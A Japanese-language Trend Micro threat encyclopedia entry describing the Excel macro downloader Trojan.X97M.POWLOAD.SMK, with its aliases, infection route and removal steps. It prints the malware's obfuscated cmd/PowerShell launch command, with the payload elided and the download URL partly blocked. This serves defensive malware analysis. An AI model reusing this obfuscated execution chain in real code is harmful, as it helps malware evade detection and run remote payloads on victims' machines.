![Trend Micro Security](https://www.trendmicro.com/content/dam/trendmicro/global/en/global/logo/logo-desktop.png)
Trojan.X97M.POWLOAD.SMK
2020年1月21日
別名:
VBA/Dldr.Agent.hzazi (ANTIVIR); VBA/TrojanDownloader.Agent.MUV trojan (NOD32)
プラットフォーム:
Windows
危険度:
ダメージ度:
感染力:
感染確認数:
情報漏えい:
![](/vinfo/imgFiles/JPlegend.jpg)
- マルウェアタイプ: トロイの木馬型
- 破壊活動の有無: なし
- 暗号化:
- 感染報告の有無: はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
ファイルサイズ 112,131 bytes
タイプ XLS
メモリ常駐 なし
発見日 2019年2月20日
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のプロセスを追加します。
- CmD /c "sET psA=(.("{3}{2}{1}{0}"-f'CT','bJE','-o','NeW') ("{1}{5}{6}{7}{2}{0}{3}{4}" -f'DefLaT','sYs','on.','E','stream','tem','.iO.comP','rEssi')( [iO.MeMoRYstrEAM][ConveRT]::"FROmBA`sE64`s`T`RinG"({Base-64 encoded}) ,[iO.comPrESsIOn.ComprESsIoNmODe]::"dECOmp`Re`SS" )^|^&("{0}{1}"-f'fOrEaC','H'){ ^&("{0}{1}{2}" -f'NeW-','ob','JECT') ("{2}{3}{1}{4}{0}" -f'R','strEAMre','Io','.','AdE')( ${_} , [SySTEM.TexT.EnCoDIng]::"aSc`II") }^| ^&("{0}{2}{1}" -f'FoRE','H','ac') {${_}."rea`dTOe`ND"( ) } ) ^| . ( ${psH`Ome}[21]+\${P`sHoME}[30]+'X')&&powerSHElL -w 1 -NOPrOfil -nOnINtera -Nol -eXeC bYPAsS set-ItEm vaRiAblE:HQt ([TYPe]( \"{1}{0}{2}\" -f'vI','EN','RoNmeNt' ) ) ; ( ^& (\"{1}{0}{2}\" -f 'aBl','VaRi','e' ) ( \"{0}{3}{4}{1}{2}\"-f 'E','oNco','nTExT','Xe','cuTi' ) ).\"vA`LUE\".\"iN`VoKecO`mMaND\".\"inV`O`kESCR`ipT\"( ( $hQT::( \"{3}{5}{1}{2}{0}{4}\"-f'ENTVar','v','IROnM','Ge','IablE','TEn').Invoke( 'PSa',( \"{2}{1}{0}\"-f'S','cES','Pro' ) )) )"
その他
マルウェアは、以下の不正なWebサイトにアクセスします。
- https://{BLOCKED}on.com/StreamGame.rar
対応方法
対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 14.844.08
初回 VSAPI パターンリリース日 2019年3月1日
VSAPI OPR パターンバージョン 14.845.00
VSAPI OPR パターンリリース日 2019年3月2日
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.X97M.POWLOAD.SMK」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください